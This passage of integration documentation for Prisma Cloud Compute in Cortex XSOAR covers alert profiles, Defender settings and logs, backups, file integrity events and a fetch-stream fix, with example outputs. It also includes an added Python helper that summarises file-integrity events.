          "Enabled": false,
          "Rules": []
        },
        "ContainerVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Defender": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Docker": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "HostCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostComplianceScan": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Incident": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "KubernetesAudit": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "NetworkFirewall": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "RegistryVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ServerlessAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "ServerlessRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "VmCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "VmVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "WaasHealth": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        }
      },
      "PreviousName": "",
      "SecurityAdvisor": {
        "CredentialID": "",
        "Enabled": false,
        "FindingsURL": "",
        "ProviderId": "",
        "TokenURL": ""
      },
      "SecurityCenter": {
        "CredentialId": "",
        "Enabled": false,
        "SourceID": ""
      },
      "SecurityHub": {
        "AccountID": "",
        "CredentialId": "",
        "Enabled": false,
        "Region": ""
      },
      "ServiceNow": {
        "Application": "",
        "Assignee": "",
        "CredentialID": "",
        "Project": ""
      },
      "Slack": {
        "Enabled": false,
        "WebhookUrl": ""
      },
      "Splunk": {
        "AuthToken": {
          "Encrypted": ""
        },
        "SourceType": "",
        "Url": ""
      },
      "Sqs": {},
      "VulnerabilityImmediateAlertsEnabled": false,
      "Webhook": {
        "CredentialId": "",
        "Url": ""
      },
      "_Id": "XSOAR"
    }
  }
}
```

Human Readable Output

Alert Profiles

| Policy | enabled | allRules | rules |
| --- | --- | --- | --- |
| admission | false | true | |
| agentlessAppFirewall | true | true | |
| appEmbeddedAppFirewall | true | true | |
| appEmbeddedRuntime | false | true | |
| cloudDiscovery | false | true | |
| codeRepoVulnerability | false | true | |
| containerAppFirewall | true | true | |
| containerCompliance | false | true | |
| containerComplianceScan | false | true | |
| containerRuntime | false | true | |
| containerVulnerability | false | true | |
| defender | false | true | |
| docker | false | true | |
| hostAppFirewall | true | true | |
| hostCompliance | false | true | |
| hostComplianceScan | false | true | |
| hostRuntime | false | true | |
| hostVulnerability | false | true | |
| incident | false | true | |
| kubernetesAudit | false | true | |
| networkFirewall | false | true | |
| registryVulnerability | false | true | |
| serverlessAppFirewall | true | true | |
| serverlessRuntime | false | true | |
| vmCompliance | false | true | |
| vmVulnerability | false | true | |
| waasHealth | true | true | |

prisma-cloud-compute-get-settings-defender

Get the Defender settings.

Base Command

prisma-cloud-compute-get-settings-defender

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.DefenderSettings.AdmissionControlEnabled | Boolean | The admission control setting. |
| PrismaCloudCompute.DefenderSettings.AdmissionControlWebhookSuffix | String | The admission control webhook suffix. |
| PrismaCloudCompute.DefenderSettings.AppEmbeddedFileSystemTracingEnabled | Boolean | The app-embedded file system tracing setting. |
| PrismaCloudCompute.DefenderSettings.AutomaticUpgrade | Boolean | The automatic upgrade setting. |
| PrismaCloudCompute.DefenderSettings.DisconnectPeriodDays | Number | The disconnect period in days. |
| PrismaCloudCompute.DefenderSettings.HostCustomComplianceEnabled | Boolean | The host custom compliance setting. |
| PrismaCloudCompute.DefenderSettings.ListeningPort | Number | The Defender listening port. |

Command example

```
!prisma-cloud-compute-get-settings-defender
```

Context Example

```json
{
  "PrismaCloudCompute": {
    "DefenderSettings": {
      "AdmissionControlEnabled": false,
      "AdmissionControlWebhookSuffix": "sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf",
      "AppEmbeddedFileSystemTracingEnabled": false,
      "AutomaticUpgrade": false,
      "DisconnectPeriodDays": 1,
      "HostCustomComplianceEnabled": false,
      "ListeningPort": 9998
    }
  }
}
```

Human Readable Output

Results

| AdmissionControlEnabled | AdmissionControlWebhookSuffix | AppEmbeddedFileSystemTracingEnabled | AutomaticUpgrade | DisconnectPeriodDays | HostCustomComplianceEnabled | ListeningPort |
| --- | --- | --- | --- | --- | --- | --- |
| false | sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf | false | false | 1 | false | 9998 |

prisma-cloud-compute-logs-defender

Download the Defender logs.

Base Command

prisma-cloud-compute-logs-defender

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |
| lines | The number of log lines to fetch. Default is 10. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Defenders.Hostname | String | The hostname the log was retrieved from. |
| PrismaCloudCompute.Defenders.Logs.Level | String | The log level. |
| PrismaCloudCompute.Defenders.Logs.Log | String | The log message. |
| PrismaCloudCompute.Defenders.Logs.Time | Date | The time of the log entry. |

Command example

```
!prisma-cloud-compute-logs-defender hostname=test-host.internal lines=2
```

Context Example

```json
{
  "PrismaCloudCompute": {
    "Defenders": {
      "Hostname": "test-host.internal",
      "Logs": [
        {
          "Level": "DEBUG",
          "Log": "defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}",
          "Time": "2023-04-11T13:54:57.862Z"
        },
        {
          "Level": "DEBUG",
          "Log": "ws.go:517 Received message with type uploadLogs",
          "Time": "2023-04-11T13:54:57.861Z"
        }
      ]
    }
  }
}
```

Human Readable Output

Logs

| level | log | time |
| --- | --- | --- |
| DEBUG | defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2} | 2023-04-11T13:54:57.862Z |
| DEBUG | ws.go:517 Received message with type uploadLogs | 2023-04-11T13:54:57.861Z |

prisma-cloud-compute-logs-defender-download

Download a zip of all Defender logs.

Base Command

prisma-cloud-compute-logs-defender-download

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |
| lines | The number of log lines to fetch. Default is 100. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| InfoFile.Name | String | The file name. |
| InfoFile.EntryID | String | The file entry ID. |
| InfoFile.Size | Number | The file size. |
| InfoFile.Type | String | The file type. |
| InfoFile.Info | String | Basic information about the file. |
| InfoFile.Extension | String | The file extension. |

Command example

```
!prisma-cloud-compute-logs-defender-download hostname=`test-host.internal` lines=2
```

Context Example

```json
{
  "InfoFile": {
    "EntryID": "355@d93bd179-ac81-4015-8ddc-c904349d83e0",
    "Extension": "gz",
    "Info": "application/gzip",
    "Name": "test-host.internal",
    "Size": 682469,
    "Type": "gzip compressed data"
  }
}
```

prisma-cloud-compute-get-backups

Returns the available backups.

Base Command

prisma-cloud-compute-get-backups

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| project | The project to retrieve the backups from. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Backups.Id | String | The ID of the backup. |
| PrismaCloudCompute.Backups.Name | String | The name of the backup. |
| PrismaCloudCompute.Backups.Release | String | The release of the backup. |
| PrismaCloudCompute.Backups.Time | Date | The time of the backup. |

Command example

```
!prisma-cloud-compute-get-backups
```

Context Example

```json
{
  "PrismaCloudCompute": {
    "Backups": [
      {
        "Id": "daily-22.12.585-1681184909.tar.gz",
        "Name": "daily",
        "Release": "22.12.585",
        "Time": "2023-04-11T03:48:29Z"
      },
      {
        "Id": "monthly-22.12.585-1679972425.tar.gz",
        "Name": "monthly",
        "Release": "22.12.585",
        "Time": "2023-03-28T03:00:25Z"
      },
      {
        "Id": "weekly-22.12.585-1681184909.tar.gz",
        "Name": "weekly",
        "Release": "22.12.585",
        "Time": "2023-04-11T03:48:29Z"
      }
    ]
  }
}
```

Human Readable Output

Results

| Id | Name | Release | Time |
| --- | --- | --- | --- |
| daily-22.12.585-1681184909.tar.gz | daily | 22.12.585 | 2023-04-11T03:48:29Z |
| monthly-22.12.585-1679972425.tar.gz | monthly | 22.12.585 | 2023-03-28T03:00:25Z |
| weekly-22.12.585-1681184909.tar.gz | weekly | 22.12.585 | 2023-04-11T03:48:29Z |

prisma-cloud-compute-get-file-integrity-events

Base Command

prisma-cloud-compute-get-file-integrity-events

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | Hostname for which to get runtime file integrity audit events. Either event_id or hostname is required. | Optional |
| event_id | Event ID of the runtime file integrity audit event for which to get details. Either event_id or hostname is required. | Optional |
| limit | Limit on the number of events to return. Only relevant when filtering by hostname. Default is 10. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.FileIntegrity.Path | string | The absolute path of the event. |
| PrismaCloudCompute.FileIntegrity.RuleName | string | The name of the file integrity rule that was applied. |
| PrismaCloudCompute.FileIntegrity.AccountID | string | The cloud account ID. |
| PrismaCloudCompute.FileIntegrity.User | string | The user that initiated the event. |
| PrismaCloudCompute.FileIntegrity.Time | date | The time of the event. |
| PrismaCloudCompute.FileIntegrity.Hostname | string | The hostname on which the event was found. |
| PrismaCloudCompute.FileIntegrity.EventType | string | The type of the file integrity event. Possible values: metadata, read, write. |
| PrismaCloudCompute.FileIntegrity.Collections | unknown | Collections to which this event applies. |
| PrismaCloudCompute.FileIntegrity.Fqdn | string | The current fully qualified domain name used in audit alerts. |
| PrismaCloudCompute.FileIntegrity.FileType | number | The file type. |
| PrismaCloudCompute.FileIntegrity.ProcessName | string | The name of the process that initiated the event. |
| PrismaCloudCompute.FileIntegrity.Cluster | string | The cluster on which the event was found. |
| PrismaCloudCompute.FileIntegrity._Id | string | The activity's unique identifier. |
| PrismaCloudCompute.FileIntegrity.Description | unknown | A human-readable description of the action performed on the path. |

Command example

```
!prisma-cloud-compute-get-file-integrity-events hostname=host123 limit=3
```

Context Example

```json
{
  "PrismaCloudCompute": {
    "FileIntegrity": [
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-30T01:16:01.037Z",
        "User": "root",
        "_Id": "64ee985138b8ac44a6f3d468"
      },
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-30T00:16:01.883Z",
        "User": "root",
        "_Id": "64ee8a4138b8ac44a6f3d460"
      },
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-29T23:16:01.673Z",
        "User": "root",
        "_Id": "64ee7c3138b8ac44a6f3d458"
      }
    ]
  }
}
```

Human Readable Output

Results

| AccountID | Cluster | Collections | Description | EventType | FileType | Fqdn | Hostname | Path | ProcessName | RuleName | Time | User | _Id |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-30T01:16:01.037Z | root | 64ee985138b8ac44a6f3d468 |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-30T00:16:01.883Z | root | 64ee8a4138b8ac44a6f3d460 |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-29T23:16:01.673Z | root | 64ee7c3138b8ac44a6f3d458 |
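
The three events above are the same process writing the same path at one-hour intervals, which an analyst wants to see as one line rather than three. The following Python is an added example, not code from the XSOAR integration or from Prisma Cloud Compute: it collapses the `PrismaCloudCompute.FileIntegrity` list into per-host, per-path, per-process rows with a count and the mean spacing between events, and the sample input is constructed from the Context Example plus one hypothetical read event.

```python
"""Added example (not part of the XSOAR integration): triage helper for the
PrismaCloudCompute.FileIntegrity context returned by
prisma-cloud-compute-get-file-integrity-events."""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample: the three events from the Context Example above (trimmed
# to the fields used here) plus one hypothetical read event on another path.
SAMPLE_EVENTS = [
    {"Hostname": "host123", "Path": "/tmp/alert/test1", "ProcessName": "touch",
     "User": "root", "EventType": "write", "Time": "2023-08-30T01:16:01.037Z"},
    {"Hostname": "host123", "Path": "/tmp/alert/test1", "ProcessName": "touch",
     "User": "root", "EventType": "write", "Time": "2023-08-30T00:16:01.883Z"},
    {"Hostname": "host123", "Path": "/tmp/alert/test1", "ProcessName": "touch",
     "User": "root", "EventType": "write", "Time": "2023-08-29T23:16:01.673Z"},
    {"Hostname": "host123", "Path": "/tmp/alert/test2", "ProcessName": "cat",
     "User": "app", "EventType": "read", "Time": "2023-08-30T01:20:00.000Z"},
]


def parse_time(value):
    """Parse the UTC timestamps in the Time field, with or without a
    fractional-seconds part, into timezone-aware datetimes."""
    for fmt in ("%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%SZ"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError(f"unrecognised timestamp: {value!r}")


def summarize_file_integrity(events):
    """Group events by (host, path, process, user, event type).

    Each row carries the count, the first/last time seen and, for groups with
    at least two events, the mean spacing in seconds, so periodic (scheduled)
    activity stands out from a one-off change. Most frequent groups come first.
    """
    groups = defaultdict(list)
    for ev in events:
        key = tuple(ev.get(f, "") for f in
                    ("Hostname", "Path", "ProcessName", "User", "EventType"))
        groups[key].append(parse_time(ev["Time"]))

    rows = []
    for (host, path, proc, user, etype), times in groups.items():
        times.sort()
        span = (times[-1] - times[0]).total_seconds()
        rows.append({
            "Hostname": host, "Path": path, "ProcessName": proc, "User": user,
            "EventType": etype, "Count": len(times),
            "FirstSeen": times[0].isoformat(), "LastSeen": times[-1].isoformat(),
            # only write events change file content; metadata/read events do not
            "ContentChanged": etype == "write",
            "IntervalSeconds": round(span / (len(times) - 1)) if len(times) > 1 else None,
        })
    rows.sort(key=lambda r: (-r["Count"], r["LastSeen"]))
    return rows
```

Feeding the command's context into `summarize_file_integrity` turns the three sample events into one row with `Count` 3 and `IntervalSeconds` 3600, which is the hourly pattern an analyst should recognise as scheduled activity before escalating.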

prisma-cloud-compute-unstuck-fetch-stream

Use this command to release the fetch stream when it is stuck and producing duplicated incidents.

Base Command

prisma-cloud-compute-unstuck-fetch-stream

Input

  • No input.

Context Output

  • No context output for this command.

Command example

```
!prisma-cloud-compute-unstuck-fetch-stream
```

Human Readable Output

The fetch stream was released successfully.

General Note

  • Do not use the Reset last run button, as it causes duplicated incidents in the instance.
  • If you pressed the Reset last run button and are getting duplicated incidents, run the prisma-cloud-compute-unstuck-fetch-stream command.